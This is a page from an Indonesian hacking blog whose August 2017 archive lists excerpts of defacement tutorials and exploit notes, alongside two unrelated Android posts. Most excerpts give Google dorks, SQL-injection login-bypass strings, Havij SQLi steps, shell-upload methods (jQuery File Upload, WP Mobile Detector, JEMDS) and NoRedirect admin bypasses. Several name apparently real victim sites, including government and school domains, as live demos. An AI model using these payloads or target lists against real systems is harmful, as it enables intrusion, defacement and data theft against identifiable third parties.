Langsung ke konten utama

Postingan

Menampilkan postingan dari Agustus, 2017

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...

Cara Deface Jquery File Upload

assalamualaikum wr.wb sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC Jquery File Upload :'v menurut gue ini cara deface yang paling mudah tapi kita harus pande pande bypass ext shell nya :'v ok kita lanjut ke tutorial Bahan Bahan -Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll -dork : Touch Me  csrf onlen : Mpssh exploit : http://target.com/[path]/server/php/  itu aja :'v Tutorial   yang pertama adalah kita dorking bisa lewat google image ato google biasa klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian contoh w dorking di google image : Google Image ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v ok lanjut ekse go to csrf nya :) trus isi url target trus post filenya files [] contoh punya saya : selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb : nah klo ...

Cara Deface Dengan SQLI (Havij)

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini sekarang gua mau share cara makenya oke langsung aja Bahan Bahan  -Havij Crack nya ( download disini gan ) -google dork : ( download disini ) -Kesabaran :D Tutorial  kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop lalu klik kanan pada havij nya lalu Klik Run as admin penampakan havij nya gini gan oke selanjutnya kamu cari target dlu contoh saya ada live target live : www.labooi.com/page.php?articles=17 exploit : site.com/contoh.php?id=69' tambahin petik oke Selanjutnya kita masukin ke havij nya tanpa tanda petik lihat ss diatas, oke selanjut nya adalah kita klik analyze kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya pencet tables setelah itu klik get tables ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns  contoh :      user    ...

Alasan Penamaan Cemilan Pada Sistem Operasi Android

A. Pengertian Android Android adalah sistem operasi yang berbasis Linux untuk telepon seluler seperti telepon pintar dan komputer tablet. Android menyediakan platform terbuka bagi para pengembang untuk menciptakan aplikasi mereka sendiri untuk digunakan oleh bermacam peranti bergerak. Awalnya, Google Inc. membeli Android Inc., pendatang baru yang membuat peranti lunak untuk ponsel. Kemudian untuk mengembangkan Android, dibentuklah Open Handset Alliance, konsorsium dari 34 perusahaan peranti keras, peranti lunak, dan telekomunikasi, termasuk Google, HTC, Intel, Motorola, Qualcomm, T-Mobile, dan Nvidia. Baca Juga :  Mengenal Android Oreo Open Wonder dan Kelebihannya B. Alasan Penamaan Cemilan Setiap perusahaan teknologi punya cara tersendiri dalam melakukan penamaan sistem operasi. Apple, ambil contoh, perusahaan itu selalu menggunakan nama kucing besar (Cheetah, Jaguar, Panther, Lion, dan lain sebagainya) untuk sistem operasi Mac-nya. ⠀ Berbeda dengan Apple, Google justru selalu men...

Mengenal Android 8.0 Oreo Open Wonder

Setelah selama beberapa bulan ini Android 8.0 dipanggil Android O, kini akhirnya Google resmi mengumumkan nama Android 8.0 menjadi Android 8.0 Oreo. Tentu ini sesuai harapan banyak orang yang telah memprediksikan nama tersebut karena sangat familiar. Selain itu, ini juga menjadi kali kedua Google bekerjasama secara komersial, setelah dahulu menggunakan nama KitKat untuk Android 4.4. A. Pengertian Android Android adalah sistem operasi yang berbasis Linux untuk telepon seluler seperti telepon pintar dan komputer tablet. Android menyediakan platform terbuka bagi para pengembang untuk menciptakan aplikasi mereka sendiri untuk digunakan oleh bermacam peranti bergerak. Awalnya, Google Inc. membeli Android Inc., pendatang baru yang membuat peranti lunak untuk ponsel. Kemudian untuk mengembangkan Android, dibentuklah Open Handset Alliance, konsorsium dari 34 perusahaan peranti keras, peranti lunak, dan telekomunikasi, termasuk Google, HTC, Intel, Motorola, Qualcomm, T-Mobile, dan Nvidia. Baca ...

Deface Register Pro Taxi Shell Upload

Deface Register Pro Taxi Shell Upload Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Register Pro Taxi Shell Upload Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Bahan Bahan : -Dork -SC Deface -Shell  "Dan tentu saja Otak" Step by Step : 1. Langkah pertama Temukan Target anda dengan Dork ini     inurl:public/user/signup (Kembangin lagi biar dapat yang Vuln) 2. Ciri ciri web Vuln Ialah seperti ini 3. Klik Create An Account. Isi data sebebas anda 4. Jika Sudah Klik Profile. Kemudian Upload Shell Agan 5. Cara Menemukan Shell. Tekan CTRL+U di keyboard     kemudian cari format apa yg kalian Upload Mimin: Upload format PHP 6. Jreng Jreng Shell udah terupload Bebas Mau ngapain :D 7. Mimin cuman upload SC Deface AJa Jangan Lupa Like Nya :) Sekianlah Postingan Dari All Tutoc Cyber tentang "Deface Register Pro Taxi Shell Upload" Semoga Bisa Berm...

JigyasaSoftwar bypass admin & upload file

# Exploit Title: JigyasaSoftwar bypass admin & upload file # Google Dork: intext:Powered By JigyasaSoftwar # Date: 2017-08-15 # Exploit Author: Mkali07 # Vendor Homepage: JigyasaSoftwate(kumarchandan.984@gmail.com) # Tested on: Linux #Contact With Me : Mkalim07@protonmail.com #Attack: http://www.site.com/[+]--> News-Events.aspx #example : http://www.site.com/News-Events.aspx #demo: www.itidumka.org/News-Events.aspx http://www.kcbcollegebero.org/News-Events.aspx Good luck

Wordpress Plugins Mobile Detector Shell Upload

yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v nyari exploit baru di exploit-db nemu juga okwowkowk langsung aja Bahan :  dork : inurl:"/wp-content/plugins/wp-mobile-detector/"           *kembangkan bekas defacean kalian oke langsung ke TKP TKP 1. Dorking di google :'v pilih satu gan jangan semua :'v 2.nah klo sudah exploit dengan wp-content/plugins/wp-mobile-detector/resize.php contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php 3.abis itu kita anuin resize.php nya contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php *site.com/deface.php nya ganti sama bekas defacean kalian 4.nah klo udah akses deh ^_^ akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php Demo http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html Kurang Paham ? vidio nya

[Webmasters Infotech] Admin Page Noredirect

[+] Exploit Title : [Webmasters Infotech] Admin Page Noredirect [+] [+] Dork : "Developed by : Webmasters Infotech" [+] [+] Vendor https://webmastersinfotech.com/ [+] [+] Tested : win 10 [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] -----------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] di addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$host]/admin/ Atau http://[$host]/admin/index.php |[+] |[+] |[+] 1- Jalankan Tool NoRedirect [Mozilla] |[+] 2- Add Site New |[+] 3- Add: ^[$site]/admin/ OR [$site]/admin/index.php |[+] 4- Path Upload The Site : [$site]/admin/admin_dashboard.php OR [$site]/admin/dashboard.php |[+] 5- Upload Ur File Thanks to : All Defacer indonesia

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^ Pertama Tutorial WP BruteForce Menggunakan Python WordPress BruteForce Bahan : Python => Download           NB : Download lalu instal Python-nya Script Python =>  Download           NB : Setelah Python Terinstal, copy script python lalu save dengan format .py Wordlist => Download Dork : - inurl:wp-login.php            - Author/admin "text" Step By Step ...

Powered by JEMDS Upload Shell

# Exploit Title: Powered by JEMDS Upload Shell # Dork : intext:"Powered by JEMDS" # Author : SHAD KARIM # Home: https://jemds.com/ # Tested on : Windows 7 ########################## # Exploit : site.com/test.php # Example : http://jerdv.com/test.php # Choose File & Click on Save After That It Will Give You An Error Just Ignore It. # Uploaded file : http://jerdv.com/data_pdf/shell.php ########################## #Demos: # http://jerdv.com/ http://jergm.com/ http://jrhae.com/ http://jrohns.com/ http://jrpsm.com/ http://jerhp.com/ http://jerpm.com/ http://jtasr.com/ http://jrrti.com/ http://jrosm.com/ ########################## # # Greetz To : Alph4 ZeR00 , AJ HACK , Dyar kalari # ##########################

Design by annvision Upload Shell

[+] Exploit Title : [ Design by annvision ] Upload Shell [+] Dork : intext:"Design by annvision. " [+] Author : HUNT3R L!ON [+] Team: D-Squad Hacking Group ☑️ [+] Tested on: Windows 7 , Mozilla Firefox [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] -----------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$host]/admin/login.php |[+] |[+] |[+] |[+] 1- Run Tool NoRedirect |[+] 2- Add Site New |[+] 3- Add: ^[$site]/admin/login.php |[+] 4- Path Upload The Site : [$site]/admin/index.php |[+] 5- Upload Shell |[+] |--------------------------------------------------------------| [+] Demo : [+] http://dhcinternational.com/admin/ [+] http://sovereignuae.com/admin/ [+] http://hochbiotech.com/admin/ [+] http://jazzrockers.com/admin/

UPT Pusat Data dan Informasi © 2013 SQLi Vulnerability

+++++++++++++++++++++++++ Google Dork : intext:"Developed by UPT Pusat Data dan Informasi © 2013" Tested on : Windows - Havij 1.16 Pro ******************************************** [+] Dorking in google or other search engine [+] Go to SQL injection link : http://www.site.com/cms//index.php?act=editkelompok&kelompok=0 [+] Go to the admin panel : http://www.site.com/path/cms//index.php?act=editkelompok&kelompok=0 ******************************************** DEMO : http://kknonline.unmuhjember.ac.id/index.php?act=editkelompok&kelompok=0 ******************************************** Berandal | OWL SQUAD

Universitas Pendidikan Ganesha CMS SQLi Vulnerability

+++++++++++++++++++++++++ Google Dork : intext:"Copyright © 2011 Universitas Pendidikan Ganesha" Tested on : Windows - Havij 1.16 Pro ******************************************** [+] Dorking in google or other search engine [+] Go to SQL injection link : http://www.site.com/cms/index.php?c=Kontak&md=mn&kid=1413 [+] Go to the admin panel : http://www.site.com/path/cms/index.php?c=Kontak&md=mn&kid=1413 ******************************************** DEMO : http://adikpapua.undiksha.ac.id/index.php?c=Kontak&md=mn&kid=1413 ******************************************** ~ \ We Are / ~ Artefvcker | Arrownonymous | Berandal | Blck0Wl? | Clutzsec | GoC_X | k4luga | KxK_PrajurID ShoursCout | WoNg_Nd35O | Yonkou4 | ZEUS | 0wLCulun | "Samael" | ./ARMVXO

Powered By Calibersoft Admin Login Bypass

# Exploit Title: Bypass Admin Page # Dork: Powered By: Calibersoft # Tested On Parrot Sec OS , Lion Sec OS , UBUNTU , RED HAT # Exploit Author: Alph4 ZeR00 # Contact on Skype: Famoushacker47 , alandosman368@gmail.com ======================================= ===================================================== ==================================================================== Demo: http://jvhrm.com/admin/home.php http://qualitycaters.com/admin/home.php ==== ========== ========================= ========================================= Vuln Page : http://site.com/admin/home.php ====== Username : 'or' '=' Password : 'or' '=' ++++++++++++++++++++++++++++++++++++++++++++++++++ Greetz To ALL Kurdish Hackers FREEDOM

Developed By www.linuxoptic.com Admin Panel Bypass

[+] Exploit Title : Developed By: www.linuxoptic.com Admin Panel Bypass [+] Dork : intext:"Developed By: www.linuxoptic.com. " [+] Author : HUNT3R L!ON [+] Team: D-Squad Hacking Group [+] Tested on : Windows 7/Linux [+] Admin Panel : http://www.website/admin/index.php [+] User : '=' 'OR' [+] Pass : '=' 'OR' [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Demo : [+] http://www.linuxoptic.com/admin/ [+] http://purbachalrealty.com/admin/ [+] http://www.tamascogroup.com/admin/ [+] http://www.globalnettl.com/admin/ [+] http://www.ashiyangroup.com/admin/

NKINFOWEB Bypass Login Vulnerability

| Exploit Title : NKINFOWEB Bypass Login Vulnerability | | Exploit Author : Ashiyane Digital Security Team | | Google Dork 1 : intext:NKINFOWEB V3 demo | | Google Dork 2 : site:.th intext:NKINFOWEB | | Tested on : Win 7 / Google Chrome | | Date : 2017-08-10 | | Vendor HomePage : http://www.nkinfoweb.org/ | |======================================| | | Tutorial : | | Search The Dork And Select Your Target | Then Go To Admin Panel At : /administrator | | Username: '=''or' | Password: '=''or' |======================================| | | Demos : | | http://ssk3.go.th/administrator/ | http://www.dongsomboon.go.th/administrator/ | http://www.dokkhamtai.go.th/administrator/ | http://bw3.bwschool.ac.th/administrator/ | http://www.nbwit.ac.th/administrator/ | http://drwit.sesao33.net/administrator/ | http://www.tratcc.ac.th/administrator/ | |=============================================================| | Discovered By : Cyber.Defacer |============================...

Stamm Webinterface Admin Panel Bypass

[+] Exploit Title : Stamm Webinterface Admin Panel Bypass [+] [+] Dork : intext:Stamm Webinterface v1.2 by Popoklopsi [+] [+] Author : Mr.T959 [+] Team : N45HT [+] Tested on : Windows XP [+] [+]================================================================== [+] [+] Admin Panel : https://www.site.co.li/admin.php [+] Login With User And Pass : '=''or' [+] [+]================================================================== [+] [+] Demo : [+] http://teamfortress2.gravedigger-company.nl/admin.php

Jpwaag's Linkpage Admin Panel Bypass

[+] Exploit Title : Jpwaag's Linkpage Admin Panel Bypass [+] [+] Dork : intext:Jpwaag's Linkpage [+] [+] Author : Mr.T959 [+] Team : N45HT [+] Tested on : Windows XP [+] [+]================================================================== [+] [+] Admin Panel : https://www.site.co.li/admin.php [+] Login With User And Pass : '=''or' [+] [+]================================================================== [+] [+] Demo : [+] http://sjoukje.stefoost.nl/admin.php

Designed By : JH Tech Network Admin Page Bypass

|[+] Exploit Title: Admin Page Bypass |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Google Dork:"Designed By : JH Tech Network" |[+] |[+] Vendor Homepage : http://jhtechnetwork.com/ |[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 02/08/2017 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.com/admincp/login.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://alamanmedicalinstruments.com/admincp/login.php |[+]http://www.sixfinger.biz/admincp/login.php |[+]http://www.abenasports.com/admincp/login.php |[+]http://rashnaenterprises.com/admincp/login.php |[+]http://momanstar.com/admincp/login.php |[+]http://raonaqrider.com/admincp/login.php |[+]http://lightgalaxyintl.com/admincp/login.php |[+]http://masterfashionco.com/admincp/login.php |[+]http://www.s...

Integrated IT Services Pvt. Ltd bypass login admin

# Exploit Title: bypass login admin Integrated IT Services Pvt. Ltd # Google Dork: inurl:"adminlogin.asp" intext:Site Designed & Developed by Integrated IT Services Pvt. Ltd # Tested on: Kali Linux, Win8 x64, # Exploit Author: irunknown's # Author Mail : Mkalim07@protonmail.com # My: Mkali07 #My Team: irunknown's ************************************* Tested site: http://www.adyar.net/adminlogin.asp http://www.iits.co.in/Attendance/adminlogin.asp ,..... *************************************************** Bypass login: http://site.com/[path]/adminlogin.asp User ==> 'or''=' Pass ==> 'or''=' *************************************** #My Team: irunknown's Good Luck!

Pro CMS Pro Designz Bypass Admin No Redirect

# Exploit Title: Pro CMS Pro Designz Bypass Admin No Redirect # Google Dork: Powered By : Pro Designz # Date: 07/30/2017 # Exploit Author: 4prili666h05T # Vendor Homepage: https://www.prodesignz.net/ # Software Link: https://www.prodesignz.net/portfolio/pro-cms/ # Tested on: Windows / Linux / MacOS 1. Go to Admin Page in http://(Domain name)/admin/login.php 2. Install Bypass No Redirect Plugins in Mozilla Firefox Download and Install Plugin here : https://addons.mozilla.org/en-US/firefox/addon/noredirect/ 3. Submit Victim Domain http://(Domain name)/admin/login.php in Bypass No Redirect 4. And go to http://(Domain name)/admin/ Demo : http://jyotigroup.in/admin/login.php http://bhagirath.co.in/admin/login.php http://franchisemart.in/admin/login.php http://gcsl.co.in/admin/login.php http://pehchanpro.com/admin/login.php http://raghuunayar.com/admin/login.php Free Palestine, Free Kashmir, PhantomGhost was here Thanks to : ./Mr.3RR0R - ./Mr.Aljabar - ./Alternation - ./Exect1337 - ./MR.WWW ...

Synergica Solutions SAS admin panel bypass

[+] Synergica Solutions SAS admin panel bypass [+] [+] Dork : intext:Copyright © 2017 Synergica Solutions SAS [+] [+] Author : KiLLeR-X [+] Team : Giant's PS [+] Tested on : Windows 10 [+] [+]================================================================== [+] [+] Admin Panel : https://www.target.co/tr/admin/ [+] user:'OR''=' [+] pass:'OR''=' [+]================================================================== [+] [+] Demo : [+] http://www.synergica.co/tr/admin/ Greet'z:Bl4ck_Knight - 9nas_007 - Mo0dypl

NSWEB Admin Login Bypass

# Exploit Title: NSWEB Admin Login Bypass # Author : Sipahiler / TurkZ.org # Date : 2017-07-26 # Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved # Tested on : Kali Linux And W7 # Vendor Home : http://www.nsweb.rs/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ Tutorial : [+] Dorking in google or other search enggine [+] Open target [+] Enter username and password with [+] Username: 'or' '=' [+] Password: 'or' '=' Demo : http://www.nsweb.rs/admin http://www.nskoncept.rs/admin/ Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & Empire_Fatih & S1R

Recruitnex Consultancy Admin Panel Bypass

[+] Exploit Title : Recruitnex Consultancy Admin Panel Bypass [+] [+] Dork : intext:Recruitnex Consultancy Pte Ltd. All rights reserved. [+] [+] Author : Mr.T959 [+] Team : N45HT [+] Tested on : Windows XP [+] [+]================================================================== [+] [+] Admin Panel : https://www.site.co.li/admin/login.php [+] Login With User And Pass : '=''or' [+] [+]================================================================== [+] [+] Demo : [+] http://www.recruitnex.com.sg/admin/login.php

ebattery Admin Login bypass

  # Exploit Title: ebattery Admin Login bypass # Dork : "Powered by SS Technologies" # Author: Alireza Nejati # Vendor : http://www.sswebtech.in/ # Tested on: win 8 ============================== Tutorial : [+] Dorking in google [+] Open target [+] Enter username and password with [+] Username: '=' 'or' [+] Password: '=' 'or' ============================== Example site : http://ebattery.in/admin/